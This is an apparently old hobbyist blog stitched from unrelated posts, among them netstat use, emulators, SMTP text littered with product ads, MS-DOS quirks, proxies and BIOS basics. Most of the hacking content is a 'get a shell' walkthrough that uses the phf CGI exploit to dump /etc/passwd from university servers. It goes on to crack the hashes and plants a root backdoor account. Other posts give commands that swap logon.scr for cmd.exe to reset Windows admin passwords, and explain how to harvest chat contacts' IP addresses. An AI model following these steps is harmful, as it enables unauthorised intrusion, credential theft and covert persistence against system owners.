Tuesday

Secure Computer: Use Of Netstat

Use Of Netstat


Use Of Netstat
  (To OPEN Netstat) - To open [Netstat] you must do the following: Click on the


Net stat
  [Start] button-->Then click [Programs]--> Then look for [Ms-Dos Prompt].

Netstat is a very helpful tool that has many uses. I personally use Netstat

to get IP addresses from other users I'm talking with on ICQ or AIM.  Also

you can use Netstat go moniter your port activity for attackers sending syn

requests (part of the TCP/IP 3 way handshake) or just to see what ports are

listening/Established. Look at the example below for the average layout of

a response to typing Netstat at the

Net Stat Commnd
C:\windows\ prompt.



C:\WINDOWS>netstat



Active Connections



  Proto  Local Address          Foreign Address        State

  TCP    pavilion:25872         WARLOCK:1045           ESTABLISHED

  TCP    pavilion:25872         sy-as-09-112.free.net.au:3925  ESTABLISHED

  TCP    pavilion:31580         WARLOCK:1046           ESTABLISHED

  TCP    pavilion:2980          205.188.2.9:5190       ESTABLISHED

  TCP    pavilion:3039          24.66.10.101.on.wave.home.com:1031  ESTABLISHED



Now look above at the example. You will see [Proto] on the top left. This just

tells you if the protocol is TCP/UDP etc. Next to the right you will see

[Local Address] this just tells you the local IP/Host name:Port open.  Then to the

right once again you will see [Foreign Address] this will give you the persons

IP/Host name and port in the format of IP:Port with ":" in between the port and IP.

And at last you will see [State] Which simply states the STATE of the connection.

This can be Established if it is connected or waiting connect if its listening.

Now with this knowledge we will dive into deeper on how to use this for monitering

and port activity and detecting open ports in use.



Detecting Open ports


Now so you are noticing something funny is going on with your computer? Your cd-rom

tray is going crazy...Opening and closing when your doing nothing. And you say What the

phruck is going on..or you realize someones been messing with a Trojan on your computer.

So now your goal is to locate what trojan it is so you can remove it right? Well your right.

So you goto your ms-dos prompt. Now there are many ways to use Netstat and below is a help

menu. Look through it.



C:\WINDOWS>netstat ?



Displays protocol statistics and current TCP/IP network connections.



NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]



  -a            Displays all connections and listening ports.

  -e            Displays Ethernet statistics. This may be combined with the -s

                option.

  -n            Displays addresses and port numbers in numerical form.

  -p proto      Shows connections for the protocol specified by proto; proto

                may be TCP or UDP.  If used with the -s option to display

                per-protocol statistics, proto may be TCP, UDP, or IP.

  -r            Displays the routing table.

  -s            Displays per-protocol statistics.  By default, statistics are

                shown for TCP, UDP and IP; the -p option may be used to specify

                a subset of the default.

  interval      Redisplays selected statistics, pausing interval seconds

                between each display.  Press CTRL+C to stop redisplaying

                statistics.  If omitted, netstat will print the current

                configuration information once.



I personally like using (C:\Windows\Netstat -an) Which Displays all connections and

listening ports in the form of IP instead of Hostname.  As you see how i did the command

Netstat(space)-a(Displays all connections and listening ports.)n(in numerical form)

Netstat -an  -So doing that does TWO of the options at once no need for -a-n.  So

now that you know how to use netstat to view all your connections and listening you

can search for common ports like 12345(old Netbus Trojan),1243(subseven) etc.  This

Becomes very handy for everything you will soon find out. Take a break now and go chill

out on your couch and relax for about 5 minutes and let all this soak in then come back

ready to learn more. :)




SYN and ACK
When you here Syn and Ack(ACKnowledge) you do not think of the communication of packets on

your system. Well let me tell you what SYN and ACK do.

    [SYN] - SYN in common words is a request for a connection used in the 3-way handshake

in TCP/IP. Once you send a SYN out for a connection, the target computer will reply with a SYN and ACK. So basically when you see in [State] catagory Syn that means you are sending

out a request to connect to something.

    [ACK] - Now the ACK is a ACKnowledgement to the request made by a computer that is

trying to connect to you. Once a Syn is sent to you you need to ACK it, then Send back another syn to the computer requesting connection to confirm the packet sent was correct.

I sure hope that helped you understand a little more about SYN and ACK. If you have further

questions try looking for texts on TCP/IP (such as BSRF's TCP/IP text - blacksun.box.sk/tcpip.txt). Now onto the fun stuff.




Using Netstat it for ICQ and AIM


Have you ever wanted to get someones IP address or hostname using [Aol Instant Messanger]

or [ICQ]? Well your in Luck.

    [AIM] - With AIM you can not ussually find the exact IP address without some trial and error because most of the time it seems to open up all online users on Port

5190. So Less users online easier it is. So goto Ms-Dos Prompt and type netstat -n here you will see under [Foreign Addresses] a IP:With port 5190. Now one of those IP's connected

to you with 5190 is going to be your target aim user. Just use trial and error to find out

is ussually the easiest way.

    [ICQ] - To get a IP using netstat of a ICQ user is easy before talking to the person on ICQ you must open ms-dos prompt and do netstat -n to list all IP's and ports.Write them

down or copy them somewhere you will remember to look back. Now it's time to find out his

IP. Message the user witha  single message now quickly do Nestat -n. And you will have a new added line of a IP address, just search for the new one on the list under foreign and once you find it you now have your buddys ip without any patches or hacks. Pure skill :P.

Wednesday

Gaming on Laptop / netbook

ou may have thought that gaming on slower notebooks and netbooks would be difficult, but this isn’t the case. You won’t be playing Mafia 2, but older games that are still considered some of the best ever made – like Chrono Trigger – are easily playable. I may update this thread with pictures for some of these emulators, but this will get you started.

You need

Minimum system requirements:

CPU: Intel Atom 1.6GHz +
RAM: 1GB +
GPU: Onboard +
HDD: 5GB +
OS: XP 

Recommended system settings

CPU: 3GHz Dual core +
RAM: 2GB +
GPU: AMD 4200 / 5500 series w/ 512MB VRAM +
HDD: As much as you can spare
OS: 7 (either x86-64 or x64)


The key to gaming on these systems are emulators. They are available for most systems and playback fine on the minimum specs, with some detail settings turned down. The recommended specs should be able to push every setting to high, and enable HQ filters. If you have a 16:9 monitor you will see black mattes on some of these emulators.

So, these are some of your choices:

1)Dosbox – this will run a lot of classic DOS games. I installed Wolf 3D off a CD that I still had from the 90’s and it plays perfectly, with mattes on the left and right. You can also play older RTS’s etc.

2)ZSNES – this is a SNES emulator that you can use to play some classics such as Chrono Trigger or Secret of Mana

3)Nestopia – this is an NES emulator. Great for playing through the original Final Fantasy.

4)Visual Boy Advance – for old GBA games.

5)EPSXE – this is a PSX emulator that works for most PSX games, some need patches you can find online. You can rip your PSX games to HDD and play them via Imgburn

6)Pre 2004 games such as Black and White and Max Payne can be played on older laptops .

7)Other systems, MAME etc.

I tried these out on a laptop with a P9700/2.8GHz Core 2 with 6GB RAM and a 4500MHD/9300M GS chip. On a netbook with a standard Atom, you need to turn down some of the PSX settings to maintain a smooth frame rate.

For any system, you absolutely need the latest GPU driver and the latest DirectX. For EPSXE you might need to add it as a DEP exception if you have DEP enabled for all programs. Everything can be found online.

These games will swallow hours of a time, so take heed . . . .

 EPSXE
Virtual Boy Advance (VBA-M)
Nestopia  

ZSNES

DosBox: DosBoX

Monday

Mail Transfer Protocol(SMTP)

SMTP Config
The objective of Simple Mail Transfer Protocol (SMTP) is to transfer
mail reliably and efficiently.
HP EX490 1TB Mediasmart Home Server (Black)ZyXEL NSA210 Digital Media Storage ServerAntec Titan 650 ExtendATX Server Case (Black)
SMTP is independent of the particular transmission subsystem and
requires only a reliable ordered data stream channel. Appendices A,
B, C, and D describe the use of SMTP with various transport services.
A Glossary provides the definitions of terms as used in this
document.StarTech.com Black Standard Universal Server Rack Cabinet Shelfserver Rack

An important feature of SMTP is its capability to relay mail across
transport service environments. A transport service provides an
interprocess communication environment (IPCE). An IPCE may cover one
network, several networks, or a subset of a network. 
 Dell PowerEdge 2850 Dual Xeon 3.0GHz 4GB 3x36GB DVD FDD 2U Server w/Video, LAN & RAID - No Operating System
It is important to realize that transport systems (or IPCEs) are not one-to-one with
networks. A process can communicate directly with another process 
SMTP Server

through any mutually known IPCE. Mail is an application or use of
interprocess communication. Mail can be communicated between
processes in different IPCEs by relaying through a process connected
to two (or more) IPCEs. More specifically, mail can be relayed
between hosts on different transport systems by a host on both
transport systems.

Install Xp From Dos 
FTP Server 
Network Configuration 
TCP / IP 

Saturday

Shell

Hacking: The Art of Exploitation, 2nd Edition
Hacking
What isUnix Shell Programing


    
  Have a shell

I have read many a hacking e-zines, and 'how to hack' documents before. They
are ok, interesting etc.  but they always show you how to get root through a
shell, what people seem to forget is the fact that you have to actually get
the password before you can use a shell to an account. You might be lucky
and find that l:guest p:guest will work. In this text I will show you how
easy hacking is ( on old deformed systems ) and how you can get a shell of
some sort in 24 hours after reading this. I am not going to go on to explain
how to get root after getting a shell as there are 1000's of texts and C
programs which explain this.
OK, the very first thing you need to do is to have a WWW browser, a telnet
program, john the ripper kracker program ( i recommend ) and a good
dictionary file.
WWW Browser - Netrape or MSIE are fine
Telnet Program - One which lets you set which port you want to connect to
John The Ripper - Will be at http://www.sinnerz.com/darkfool
Dictionary File - Found at many hacking web sites. Do a search for one
Ok, every net user/wanna be hacker will have most of those programs and if
ya don't there really easy to get a hold of.
OK, now I am going to tell you something about Japan. They make your stero,
they made the bits inside your computer, they made your car, they made
everything electronic around you, you have their eyes at the end of your
Shell

nob, but they are rubbish at one thing, the internet and security. The
honestly don't know anything about internet security, I have rooted or got
shells on many a japanese servers. These are my favourite systems to attack
because they are soooooo easy. I am also told that Australian servers are
very easy too, some Berkeley UNiversity machines are very easy to krack too.
Next thing you got to do is fire up your WWW browser. Goto AltaVista
http://www.alta-vista.digital.com if you don't know already this is a search
engine which has some very nice advance features.
Once here in the search field box type this  url:ac.jp and press search,
this looks for all URL's with ac.jp in.  This is academic places in Japan,
similar to the US which has .edu instead. You will be presented with a load
of web pages which text you probably can't read because its all in some
funny language. More importantly is the URL which they point out, for
example, www.mo.cs.rekimoko.ac.jp    , notice the ac.jp at the end of it.
Click on the link to the site ( longer server urls are easier to break into
BTW ). When the URL appears on the WWW browser box at the top of the screen
add this line to the end of it.
/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
or
/cgi/phf?Qalias=x%0a/bin/cat%20/etc/passwd
i.e
http://www.mo.cs.rekimoko.ac.jp/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
To all you 313375 out there, yes, i know this is the phf technique and it is
virtually dead, but you'll be surpised where you can use this.
This technique of finding the password file to the system is old, it was
first used in November 1996 on the FBI web page by a few hackers. It has
been patched up by a lot of servers, so this won't work on www.nasa.gov or
most of www.*.com  but still works on many University servers outside of EU
and US.
Ok, once the URL has been entered you will see a number or things :-
Error 404
/cgi-bin/phf is not found on this server
OR
WARNING
You do not have permission to view /cgi-bin/phf/ on this server
There are a number of other things the server might say, but the thing you
want it to say is the following :-
/cgi/phf?Qalias=x%0a/bin/cat%20/etc/passwd
root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
www-admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:3A62i9qr.YmO.:1012:10:Hisaharu
TANAKA:/home/user/kangaroo:/usr/local/bin/tcsh
maemae:dvUMqNmeeENFs:1016:10:Akiko Maeda:/home/user/maemae:/bin/csh
watanaby:ewF90K0gwXVD6:1006:10:Yoshiaki WATANABE:/home/user/watanaby:/bin/csh
kake:kFph8HEM/aaAA:1007:10:Tetsuro KAKESHITA:/home/user/kake:/bin/csh
etc.......
This means you have hit the jackpot !
If you get something similar to this but all lines have something similar to
the following :-
root:*:0:1:Operator:/:/bin/csh
www-admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:*:1012:10:Hisaharu  TANAKA:/home/user/kangaroo:/usr/local/bin/tcsh
maemae:*:1016:10:Akiko Maeda:/home/user/maemae:/bin/csh
watanaby:*:1006:10:Yoshiaki WATANABE:/home/user/watanaby:/bin/csh
kake:*:1007:10:Tetsuro KAKESHITA:/home/user/kake:/bin/csh
( notice the * )  if you don't know already this means its shadowed and you
cannot work out the password using a shadowed file.
If some but not all of the logins have * in them its ok, its worthwhile
getting the ones which aren't shadowed, hey, a shell is a shell !
Get all the lines which aren't shadowed and then paste them into notepad,
write the name of the server in the top line of the file and save it.
Ok now for the next bit, this is fairly simple but can be a lengthy process
depending upon which speed machine you have and how big your password file
is and dictionary file. Use john the ripper or whatever password cracker you
are using, although i recommend john the ripper because its quick. This will
probably take a long time so go to the pub or have a drive or something.......
If you are lucky enough to work out the passwords to the logins then well
done, if you don't, them find another server or increase the size of your
dictionary file, make it as big as you can, the bigger the better, the more
luck you will have in finding the password.
OK, you got some passwords to a few logins, if you got root them jump around
the room with joy ( I do ). If you didn't then, well, atleast you got
yourself some shells. Now, if you want to keep these shells without anyone
knowing then your best bet is to telnet to the site at port 79, you will
have a blank prompt, here type in the username of the account you cracked,
it will tell you the last time they logged in, do this for all the accounts,
use the account which isn't used very much, the best ones are the ones which
say ' User Never Logged On ' because then the account is basically yours !
{ Note: If you get root type the following at the shell prompt :-
echo "myserver::0:0:Test User:/:/bin/csh" >> \etc\passwd
This wil allow you to login to the server with l:myserver so you don't get
admin suspicous when they see people login in as root. } 
Hide yourself as much as possible, if you already have a shell then go
through that first when logging on, or, telnet to the hacked shell and then
re-telnet to the hacked shell using the hacked shell, if you see what I
mean, so your who appears as localhost. Get some C scripts which delete your
presence etc...Social Engineering: The Art of Human Hacking
Thats it, if there's demand to explain this in further detail then please
e-mail me telling me you want a follow up, I don't do personal help so don't
e-mail me asking for help PLEASE DON'T !

Friday

What is a trojan worm virus logic bomb?



Trojan:
     Remember the Trojan Horse? Bad guys hid inside it until they could get
     into the city to do their evil deed. A trojan computer program is
     similar. It is a program which does an unauthorized function, hidden
     inside an authorized program. It does something other than what it
     claims to do, usually something malicious (although not necessarily!),
     and it is intended by the author to do whatever it does. If it's not
     intentional, its called a 'bug' or, in some cases, a feature :) Some
     virus scanning programs detect some trojans. Some virus scanning
     programs don't detect any trojans. No virus scanners detect all
     trojans.
Virus:
     A virus is an independent program which reproduces itself. It may
     attach to other programs, it may create copies of itself (as in
     companion viruses). It may damage or corrupt data, change data, or
     degrade the performance of your system by utilizing resources such as
     memory or disk space. Some virus scanners detect some viruses. No
     virus scanners detect all viruses. No virus scanner can protect
     against "any and all viruses, known and unknown, now and forevermore".
Worm:
     Made famous by Robert Morris, Jr. , worms are programs which reproduce
     by copying themselves over and over, system to system, using up
     resources and sometimes slowing down the systems. They are self
     contained and use the networks to spread, in much the same way viruses
     use files to spread. Some people say the solution to viruses and worms
     is to just not have any files or networks. They are probably correct.
     We would include computers.
Logic Bomb:
     Code which will trigger a particular form of 'attack' when a
     designated condition is met. For instance, a logic bomb could delete
     all files on Dec. 5th. Unlike a virus, a logic bomb does not make
     copies of itself. More Viruses

Increase Your Computer Speed
Reason Why Computer Crash
Security Enhancements
Spyware Malware Hijackers Dialers

Monday

Backlink For Free

Create Backlink In Easy Steps.
Backlink For Free

Hidden MS-DOS Commands

Collection of undocumented and obscure features in various MS-DOS versions.

Contents:

- TRUENAME
- FDISK /STATUS
- FDISK /MBR
- SHELL=C:\COMMAND.COM /P /F
- COMMAND /F
- COMMAND /P
- COMMAND /D
- VER /R
- ECHO OFF and ECHO ON
- FORMAT /AUTOTEST
- FORMAT /BACKUP
- FORMAT /SELECT
- FORMAT /SELECT /U
- FORMAT /H
- IF EXIST <dirname>\NUL <command> and IF EXIST EMMXXXX0 <command>
- Using ATTRIB to hide directories
- SWITCHES=/W
- FOR %%V IN (/SOMETHING)
- DIR,
- COPY. A:
- DOS?=HIGH
- INSTALLHIGH
- Using : for batch file comments
- REM in lines with pipes or redirection
- Delimiter character

===========================================================================
 TRUENAME
 --------

Internal DOS 5.0 command.  Canonicalize a filename or path (using DOS interrupt 21h, function 60) prints the actual directory.

     Syntax:

     TRUENAME filename   - Prints the complete path to file.
     TRUENAME directory  - Prints the complete path to directory.

Note:  If the path is in a network, it starts with a \\machine-name.

TRUENAME is analogous to the UNIX "whence" command.  It returns the real fully-qualified path name for a command.

TRUENAME is useful in networks, where a physical drive may be mapped to a logical volume, and the user needs to know the physical location of the file.  It ignores the DOS SUBST and JOIN commands, or network MAPped drives.

TRUENAME is an undocumented MS-DOS feature, but it is documented in JP Software's 4DOS software (COMMAND.COM replacement) as follows:

     Syntax:

     TRUENAME [d:][path]filename

     Purpose:

     Returns a fully qualified filename.

     Comments:

     TRUENAME will see "through" JOIN and SUBST commands, and
     requires MS-DOS 3.0 or above.

     Example:

     The following command uses TRUENAME to get the true pathname
     for a file:

     c:\>subst d: c:\util\test
     c:\>truename d:\test.exe

     c:\util\test\test.exe

TRUENAME : will reveal the full name drive and path of the filename.  If you specify a wildcard (*) in the filename, it will expand the filename to use question marks instead.  If the path includes the ..\ sequence, TRUENAME will examine the directory structure and calculate the path.

Stranger still, the line:

     TRUENAME \CRONK\FLIBBET\..\ART

...produces the response:

     C:\CRONK\ART

...even if the directories \CRONK\FLIBBET and the file ART don't exist!  Don't expect this command to work well across networks.  After all, this is still undocumented in MS-DOS for a reason!

===========================================================================
 FDISK /STATUS
 -------------

Prints a screen just like using option 4 of FDISK, "Partition information", but includes extended partition information.  Nice if you want to get an overview without fear of pressing the wrong keys.

Doesn't work in DOS 3.30.

===========================================================================
 FDISK /MBR
 ----------

MS-DOS 5.0 FDISK has an undocumented parameter, /MBR, that causes it to write the master boot record to the hard disk without altering the partition table information.  While this feature is not documented, it can be told to customers on a need-to-know basis.

Warning:  Writing the master boot record to the hard disk in this manner can make certain hard disks partitioned with SpeedStor unusable.  It can also cause problems for some dual-boot programs, or for disks with more than 4 partitions.  Specific information is below.

What is the MBR?

At the end of the ROM BIOS bootstrap routine, the BIOS will read and execute the first physical sector of the first floppy or hard drive on the system. This first sector of the hard disk is called the master boot record, or sometimes the partition table or master boot block. At the beginning of this sector of the hard disk is a small program. At the end of this sector is where the partition information, or partition table, is stored. This program uses the partition information to determine which partition is bootable (usually the first primary DOS partition) and attempts to boot from it.
DOS for Dummies
This program is what is written to the disk by FDISK /MBR and is usually called the master boot record.  During normal operation, FDISK only writes this program to the disk if there is no master boot record.

Why is the MBR changed during Setup?

During installation of Microsoft MS-DOS 5 Upgrade, Setup will replace the master boot record on the hard disk with code to display the message:
Justamente Tres
        The MS-DOS 5.0 Setup was not completed.
        Insert the UNINSTALL #1 diskette in drive A.
        Press the ENTER key to continue.

This message should be erased and the master boot code rewritten before Setup is completed. If a problem occurs during Setup and you return to the previous MS-DOS, UNINSTAL should also remove this message. However, should Setup or UNINSTAL fail to remove this message, or should the master boot record become corrupted, a new master boot record can be written to the disk using the following command:

         C:\>fdisk /mbr

     WARNINGS:

     This option should not be used if:

        - the disk was partitioned using Storage Dimensions'
          SpeedStor utility with its /Bootall option
        - more than 4 partitions exist
        - certain dual-boot programs are in use

Storage Dimensions' SpeedStor utility using the /Bootall option redefines the drive's physical parameters (cylinder, head, sector).  /BOOTALL stores information on how the drive has been changed in an area of the master boot record that MS-DOS does not use. FDISK /MBR will erase that information, making the disk unusable.

Some older OEM versions of MS-DOS and some third-party partitioning utilities can create more than 4 partitions.  Additional partition information is commonly stored information on partitions in an area that FDISK /MBR will overwrite.

Some dual-boot programs have a special MBR that asks the user which operating system they want on bootup.  FDISK /MBR erases this program.  Dual-boot systems that boot whichever partition is marked Active are not affected by FDISK /MBR.

If you have a Boot Sector Virus, just boot from a known "clean" floppy disk that's write protected and which has FDISK on it, and run FDISK /MBR.

===========================================================================
 SHELL=C:\COMMAND.COM /P /F
 --------------------------

The /F in the CONFIG.SYS SHELL= statement forces a "Fail" response to all "Abort, Retry, Fail" prompts issued by the DOS critical error handler.

===========================================================================
 COMMAND /F
 ----------

Entered on the command line, COMMAND /F makes all those annoying "Abort, Retry, Ignore, Fail" disk error messages default to "Fail" from then on until rebooting.

===========================================================================
 COMMAND /P
 ----------

For DOS 3.30 (not checked with other versions):  Docs say that this doesn't allow you to exit back to the previous shell, but /P also forces AUTOEXEC.BAT to be run on secondary shells.

===========================================================================
 COMMAND /D
 ----------

When used with a primary shell, or secondary with /P, prevents execution of AUTOEXEC.BAT.

===========================================================================
 VER /R
 ------

Yields extended information about the DOS version:

     MS-DOS Version 5.00
     Revision A
     DOS is in HMA

Doesn't work with DOS 3.30.  VER /R is a documented feature of JP Software's 4DOS.

===========================================================================
 ECHO OFF and ECHO ON
 --------------------

Entering ECHO OFF from the command line erases the prompt and leaves just a cursor on the screen.  ECHO ON from the command line restores the prompt.  This works with all version of DOS.

One of the most frequently asked questions is "How do I ECHO a blank line in a batch file?"  The most common answer is to use ECHO directly followed by a period:  ECHO. like so.  However, just about any "white space" character will work, as well as any "delimiter".  The following alternatives can be used:  ECHO.  ECHO"  ECHO,  ECHO:  ECHO;  ECHO[  ECHO]  etc.  Apparently it's just the way that the command handles the delimiter and has been available from way back!  Microsoft just began mentioning it in the documentation recently, though, and their examples use a period.

===========================================================================
 FORMAT /AUTOTEST
 ----------------

The autotest parameter will allow FORMAT to proceed, checking the existing format of the disk (unless the /U parameter with DOS 5 or 6 is also present), and proceeding with the format.

All this will take place with no delay and no waiting for user input.  It will also end without pausing.  It will not ask for a volume label or whether to format another diskette.

WARNING!  This procedure will also work on hard drives!  Be very cautious if you plan to use this feature!

===========================================================================
 FORMAT /BACKUP
 --------------

This works exactly like /AUTOTEST, but it does ask for a volume label.

===========================================================================
 FORMAT /SELECT
 --------------

This is like the DOS MIRROR command... For safety-fanatics only.

===========================================================================
 FORMAT /SELECT /U
 -----------------

Just makes a disk unreadable.  Guess it could be handy?

===========================================================================
 FORMAT /H
 ---------

In DOS 3.30 (not tested with other versions), FORMAT /H will cause the format to begin immediately after pressing Y in response to "Format another", rather than displaying "Place disk to be formatted in drive x: and press Enter" on a second and subsequent disks.

In DOS 5.0, FORMAT reports "invalid switch".

===========================================================================
 IF EXIST <dirname>\NUL <command> and IF EXIST EMMXXXX0 <command>
 ----------------------------------------------------------------

This is a handy quirk of DOS.  Installable drivers are seen as files in all directories.  You can use the if exist test to either test for the existence of a directory, with "if exist <dirname>\nul", which fails if the directory does not exist because the nul device is not found; or to test whether any driver is loaded, such as the DOS 5 or 6 EMM386 memory manager.

Caveats:  For testing NUL, you need to know the name of the directory or the driver whose existence you are testing, and this is MS-DOS specific -- it doesn't work on network drives, and may not work under DR-DOS.

Where did you learn the "EMMXXXX0" name from?  Instead of typing MEM /C, type MEM /D for the "debug" listing.

The only trouble is EXISTS returns true for COM3/4 and LPT2/3 even if the hardware does not exist.

===========================================================================
 Using ATTRIB to hide directories
 --------------------------------

The DOS 5.0 and 6.0 ATTRIB command can do the same thing for directories as it can for files:  ATTRIB +H <dirname>  will hide the named directory.

===========================================================================
 SWITCHES=/W
 -----------

Enables you to have the Windows 3.0 WINA20.386 file anywhere on your boot drive.  Without this you have to have it in the root directory.

This should not be used with Windows 3.1, since it appears to waste around 120K of UMBs.

===========================================================================
 FOR %%V IN (/SOMETHING)
 -----------------------

How can a batch file (without 4DOS) determine from which drive it has been started?

      Example:  C:\>a:test.bat

Now my batch should be able to find out that it is located on drive A: (not the path, only the drive!).

In a batch file, the variable %0 contains the name of the batch file as it was typed at the command line.  If you run the batch file as A:TEST.BAT, %0 will be "A:TEST.BAT".  If you have the directory on your path, and simply type TEST, then %0 will be "TEST".  The drive, path, and extension will only appear in %0 if you enter them in the command used to call the batch file (either typed at the command line, or called from another batch file).  So, you must specify the drive as part of the batch filename for this to work.

To extract the drive only from %0, use the undocumented FOR %%V in /SOMETHING command:

     set drive=
     for %%v in (/%0) do call test2 %%v
     echo Calling drive is %drive%

...where TEST2.BAT is:

     if not '%drive%'=='' set drive=%1:

FOR %%V IN (/SOMETHING) DO WHATEVER will do WHATEVER twice -- the first time with %%V set to the first character in SOMETHING ("S"), the second time with all the remaining characters in SOMETHING ("OMETHING").  If SOMETHING is only a single character, WHATEVER will only be called once, with that character in %%V.  If the single character is a wildcard (? or *) that wild card will not be expanded to a set of filenames.  (The main purpose of this feature is apparently to allow inclusion of the literal characters "?" and "*" without them being expanded.)

This works in DOS 3.30 and later.

===========================================================================
 DIR,
 ----

Using a comma immediately after DIR shows ALL files, including the HIDDEN ones.

This appears only to work with DOS 5.0 and 6.0.  With 3.30, it doesn't display either IO.SYS, MSDOS.SYS (both with S, H and R attribs) or a test file with A and H attribs.

With DOS 5.0, it displayed a test file with H and A, but would not display IO.SYS or MSDOS.SYS with S, H and R.  This isn't surprising actually, since S alone (without H) will prevent inclusion of a file in a normal DIR.

Not tested with DOS 4.x.  Not supported by JP Software's 4DOS.

===========================================================================
 COPY. A:
 --------

The use of a period IMMEDIATELY after some DOS statements will work just like *.*

     Examples:  DEL.      (erase all files in current directory)
                COPY. A:  (copy all files in current directory to A:)

There may be more statements with which it works.

This is actually a documented although obscure feature, though the ability to use the period with COPY is not documented.  What is documented is the fact that "." and ".." can be used to represent the current and parent directories respectively, and these will work with many applications which can handle directory names as arguments.  In this case the "." could also be viewed as a replacement for "*.*"

===========================================================================
 DOS?=HIGH
 ---------

DOS?=HIGH in CONFIG.SYS with DOS 6.0 will prompt you whether to load the DOS kernel high (into the HMA) or not.

===========================================================================
 INSTALLHIGH
 -----------
Forgot Your File Where You Store
In DOS 6.0, there is an undocumented CONFIG.SYS command called INSTALLHIGH= which works just like INSTALL= but loads the TSR high (into upper memory).

The only drawback to this is that MemMaker will not touch INSTALLHIGH lines during the optimizing process.  It just takes it as it is currently.  But then again, INSTALL= is ignored too.  All in all, INSTALL and INSTALLHIGH really are commands to set up manually by the user, and are not really recommended for normal use.  Load TSRs at the beginning of AUTOEXEC.BAT (and using LOADHIGH if desired).

       Example:

       DOS=HIGH,UMB
       DEVICE=C:\DOS\HIMEM.SYS
       DEVICE=C:\DOS\EMM386.EXE NOEMS
       INSTALLHIGH=C:\DOS\SHARE.EXE

===========================================================================
 Using : for batch file comments
 -------------------------------

DOS uses a leading : to indicate a label in a batch file.  If the next character following the : is a space or other non-alphanumeric character, then DOS will decide it's an invalid label and skip to the next line, performing no further action.  Faster batch file processing is achieved using this method for comments instead of REM commands.

===========================================================================
 REM in lines with pipes or redirection
 --------------------------------------

For example:  REM echo y | del *.*
How To Create Strong Password
Problems are encountered when trying to REM out an "echo y | del *.*" line in a batch file.  The problem appears to only occur if there is a pipe or redirection in the REMed out line, which shows that DOS first reads the entire line and processes pipes and redirections first, and then goes back to find out what to do with them in the line.  It's actually doing what it thinks you've told it:  Piping the output of REM to DEL.  Since REM has no output, DEL hangs, waiting for the answer to its question.

===========================================================================
 Delimiter character
 -------------------

Prior to DOS 5.0, there was an undocumented DOS function that would allow you to set the DOS option delimiter character to something else, like a dash (-).  Once you did this, you could use either \ or / in PATH specifications.

DOS 5.0 removed the function to set the option delimiter, but retained the function to query what it currently is.
Boot Block Recovery
Bandwidth
What is LED
Backlink For Free
 

Sunday

Secure Computer: Annonymity Of Proxy 2

Secure Computer: Deep Proxy View

Secure Computer: Anonymity

Anonymity of Proxy Server

Secure Computer: HTTP and The Web (Internet)

HTTP and The Web (Internet)

Secure Computer: What is a Proxy Server?

How/What is a Proxy Server?

Secure Computer: What is a Proxy Server?

How/What is a Proxy Server?

A Proxy Server?

How/What is a Proxy Server?
Microsoft® Proxy Server 2.0 MCSE Study System
A proxy server is a kind of buffer between your computer and the Internet resources you are accessing. The data you request come to the proxy first, and only then it transmits the data to you. I know many are looking for IP Maskers or Scramblers, but honestly, it aint real easy for the simple fact that any website that you visit needs your IP to send the info packets too. If its scrambled, you will get alot of errors and crazy redirects :P My solution? Read on........... for a good list of Proxy servers try here>>Multiproxy
Proxy Server 2.0 [Old Version]MCSE: Implementing and Supporting Microsoft Proxy Server 2.0
HTTP and The Web (Internet)
Anonymity of Proxy Server

Deep Proxy View

Annonymity Of Proxy 2

Thursday

Secure Computer: What is BIOS /Hard Drive

What is BIOS /Hard Drive

What is BIOS /Hard Drive

 Basic hard drive/BIOS

As soon as you flip that switch, your CPU starts executing shit located at F000:FFF0. This area contains the BIOS, Basic Input/Output System. This code is written in assembly and is stored in chips called EPROMs in your computer. This code will perform something known as POST, Power On Self Test. This checks for installed devices and checks if they all work. In particular it checks for the video card and runs the video
Breaking Through the BIOS Barrier: The Definitive BIOS Optimization Guide for PCs
What is Bios

BIOS usually located at C000h. Next it checks for other ROMs to see if they have installed BIOSes. Usually it then finds and executes the hard drive BIOS located at C8000h. Then it starts something like a "system inventory" where it checks for other installed devices and tests them. It does some more stuff that's all basicly useless for us right now, until it finally transfers control over to the operating system. That's the part that we're interested in. Back in the old days, only one OS was installed on a computer. If you bought a certain computer, you could only run the OS that was made for it. Nothing else. Obviosly that wasn't such a good thing as you would have to buy a new computer if you wanted a different OS, so BIOS makers came up with the Boot Sector. In case you didn't know System BIOS for IBM PCs, Compatibles, and EISA Computers (2nd Edition)yet, a Sector is the smallest area your hard drive can access. According to the ATA standards each sector is exactly 512 bytes. However ATA standards only apply to hard drives, things like floopies can use whatever they want. Knowing this we can move on to the boot sector.
What is BIOS /Hard Drive

Tuesday

Secure Computer: How to Crack Admin Password

How to Crack Admin Password


How to hack Windows XP Admin Passwords

This hack will only work if the person that owns the machine
has no intelligence. This is how it works:
When you or anyone installs Windows XP for the first time your
asked to put in your username and up to five others.
Now, unknownst to a lot of other people this is the only place in
Admin Password Crack

Hacking Admin Password

Windows XP that you can password the default Administrator Diagnostic
Account. This means that to by pass most administrators accounts
on Windows XP all you have to do is boot to safe mode by pressing F8
during boot up and choosing it. Log into the Administrator Account
and create your own or change the password on the current Account.
This only works if the user on setup specified a password for the
Administrator Account.
Hacking: The Art of Exploitation, 2nd EditionHacking For Dummies
This has worked for me on both Windows XP Home and Pro.
-----------------------------------------------------------------------------
Now this one seems to be machine dependant, it works randomly(don't know why)

If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:
(this appeared on www.astalavista.com a few days ago but i found that it wouldn't work
on the welcome screen of a normal booted machine)
-----------------------------------------------------------------------------

cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos
-----------------------------------------------------------------------------
Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.
Once this happens if you enter this command minus the quotes
"net user <admin account name here> password"
If the Administrator Account is called Frank and you want the password blah enter this
"net user Frank blah"
